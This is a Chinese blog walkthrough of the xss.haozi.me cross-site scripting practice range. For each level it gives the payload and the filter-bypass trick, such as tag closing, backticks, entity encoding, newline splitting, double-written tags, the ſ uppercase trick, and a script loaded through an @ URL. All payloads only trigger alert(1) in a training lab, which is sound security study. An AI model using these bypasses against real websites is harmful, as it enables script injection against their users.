xss.haozi教程-史上最全详解

已于 2023-04-11 16:10:01 修改
阅读量733 收藏 3
点赞数
分类专栏: CTF XSS 文章标签: web安全 xss
于 2023-04-11 16:09:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52364123/article/details/130079973
版权
CTF 同时被 2 个专栏收录
6 篇文章 1 订阅
订阅专栏
XSS
1 篇文章 0 订阅
订阅专栏

目录

0x00

0x01

0x02

0x03 反引号替代括号

0x04 编码绕过

0x06 换行绕过

0x08 换行绕过

0x09

0x0A 引入漏洞页面

0x0B 编码绕过

0x0C 双写绕过

0x0D

0x0E 特殊符号绕过

0x0F

0x10

0x11

0x00

<script>alert(1)</script>

0x01

先尝试<script>alert(1)</script>

 前后都闭合标签即可

</textarea><script>alert(1)</script><textarea>

0x02

先尝试<script>alert(1)</script>

闭合

"><script>alert(1)</script>

或者先"闭合,鼠标再移到框中

"οnmοuseοver="alert(1)

0x03 反引号替代括号

先尝试<script>alert(1)</script>

发现过滤了()

`替代括号

<script>alert`1`</script>

0x04 编码绕过

本题过滤了()和`

使用实体编码的方式绕过

首先需要加一个svg标签,代表要解码后面的编码值

将(1)用ascii编码转unicode

在线Unicode编码转换工具(ES JSON在线工具)

<svg><script>alert&#40;1&#41;</script>

0x05

尝试<script>alert(1)</script>

发现被注释掉了

html注释

<!--这是单行注释-->

<!--

        这是多行注释

        这是多行注释

-->

我们尝试闭合注释

结合源码,发现-->会被替换成表情

因此用--!>来闭合

--!><script>alert(1)</script>

0x06 换行绕过

过滤了以auto/on开头,以=结尾的字符串,并且忽略大小写

可以利用换行绕过正则

直接将等于换第二行,=前面就是空的,同时不影响第一行内容的执行

onmousemove

=alert(1)

0x07 单标签

尝试<script>alert(1)</script>

以为是闭合标签

本题过滤了尖括号之间的内容,忽略大小写

利用浏览器的兼容性,右尖括号可以不用写

<body οnlοad="alert(1)"

0x08 换行绕过

尝试<script>alert(1)</script>

尝试闭合标签

发现本题将替换为/* 坏人 */

利用换行绕过

0x09

本题要求我们必须输入指定的网址

可以先闭合script标签,然后注释掉后面

https://www.segmentfault.com"></script><script>alert(1)</script>//


也可以
http://www.segmentfault.com"></script><img src=x οnerrοr="alert(1)
http://www.segmentfault.com"></script><body οnlοad="alert(1)"

 

0x0A 引入漏洞页面

要求包含网址和上题一样,还将常用符号转换成了编码形式

以@前的字符串作为用户名,来访问@后面的网址

https://www.segmentfault.com@xss.haozi.me/j.js

这里把www.segmentfault.com当成了登录后面网址的用户名

xss.haozi.me/j.js文件内存放着alert(1);

0x0B 编码绕过

发现将所有输入转换为大写输出

html不区分大小写,而js区分大小写

构造html代码:

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

或者实体编码绕过

将alert(1)进行HTML实体字符转换

在线Unicode编码转换工具(ES JSON在线工具)

<img src="" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C 双写绕过

在0x0B基础上过滤了script

利用双写绕过

<scrscriptipt src="https://www.segmentfault.com.haozi.me/j.js"></scrscriptipt>

或者
<img src="" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0D

发现输入全在注释内,还过滤了< / " '

//为单行注释,换行可以绕过

利用换行绕过注释,再用–>忽略后面的引号和括号

0x0E 特殊符号绕过

尝试

特殊符号绕过,ſ 经过toUpperCase函数会变成S

<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>


<ſcript src="https://xss.haozi.me/j.js" ></script>

0x0F

属性值中的HTML实体编码会被浏览器成功解析,所以此处的HTML实体编码毫无用处

先闭合console.error,再添加alert

');alert(1);//

0x10

可以先闭合给data赋值,然后alert(1)

1;alert(1)

也可以直接alert(1)

0x11

"被替换为\\"

但仍然可以闭合了前面的"

然后执行alert(1)语句,并用//注释后面的语句

所以此处的过滤也是毫无用处

");alert(1)//

0x12

")</script><script>alert(1)</script><!--

由于浏览器的容错性可以简写

</script>
<script>alert(1)</script>

xss.haozi 思路总结 0x00-0x12_图南yukino的博客-CSDN博客

xss靶场练习之xss.haozi.me解析及答案_钟情妺喜107的博客-CSDN博客

kong--kong
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss.haozi.me靶机
newlife1441的博客
07-28 335
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
XSS-haozi
个人博客
08-10 353
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
xss.haozi练习通关详解
金色%夕阳的博客
08-01 1929
xss.haozi练习通关概述 0x00 分析: 执行: 0x01 分析: 执行: 0x02 分析: 执行: 0x03 分析: 执行: 0x04 分析: 执行: 0x05 分析: 执行: 0x06 分析: 执行: 0x07
XSS haozi靶场通关笔记
I_WORM的博客
01-31 2278
xss专练靶场;xss.haozi.me靶场通关笔记
xss.js.zip
07-29
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,主要发生在Web应用中。它利用了网站的信任,将恶意脚本注入到网页中,当其他用户访问这些被篡改的页面时,恶意脚本会在用户的浏览器上执行,从而窃取用户...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
Web-安全渗透全套教程XSS跨.zip
05-22
XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器进行操控。本套教程聚焦于XSS攻击的原理、检测和防御策略,旨在帮助学习者深入理解这...
Python库 | xss_utils-0.3.0-py2.py3-none-any.whl
04-27
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:xss_utils-0.3.0-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
XSS靶场(二)xss.haozi
C_LCH_2000的博客
07-29 285
xss.haozi所有关卡解法
XSS线上靶场---haozi
qq_52016943的博客
07-29 1244
XSS 在线靶场
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2016
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场。XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me解题记录
qq_43623492的博客
03-31 946
0X00 payload:<script>alert(1)</script> 0x01 这一关可以发现我们输入的东西会出现在textarea标签内,所以我们尝试闭合textarea标签 payload:</textarea><script>alert(1)</script><!-- 0x02 输入的内容会出现input标签的va...
xss.haozi靶场通关
weixin_60719780的博客
01-06 385
做完xss-labs靶场后,再继续做这个靶场,感觉这个不是很难,毕竟在第一个靶场也获取了一些经验,但是这个靶场偏向技巧,所以还是以了解为主。
xss.haozi.me通关教程
自强不息
02-01 1187
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5318
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
xss.haozi.me靶场“0x0B-0x12”通关教程
最新发布
钟言的博客
03-13 4506
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
alert(1) to xss.haozi.me with #0x01
Annanljz
06-05 253
#0x01 题目: 这道题将我们输入的内容放入 textarea 标签,使js代码被当做字符串渲染,那么我们只需要破坏 textarea标签即可,输入 textarea 的闭标签,使js代码放在标签外面 ...
alert(1) to xss.haozi.me with #0x00
Annanljz
05-29 310
题库来源于xss.haozi.me,题目的终极目标在于想方设法让浏览器渲染出JavaScript代码alert(1)并成功弹窗 #0x00 题目: 这道题对于input输入没有过滤措施,且直接将用户输入渲染至div中,那么我们直接在input中输入script代码即可,作为第一道题,快速清晰地让我们了解xss的简单攻击手段: 成功破解: ...
http://xss.tesla-space.com/
07-27
XSS攻击是指攻击者向web页面的输入表单、URL或留言板等位置插入恶意JavaScript代码,以达到攻击者的目的。\[2\]根据引用\[1\]的描述,XSS攻击可以导致攻击者获取用户的cookies,从而以用户的身份进行任何操作。因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值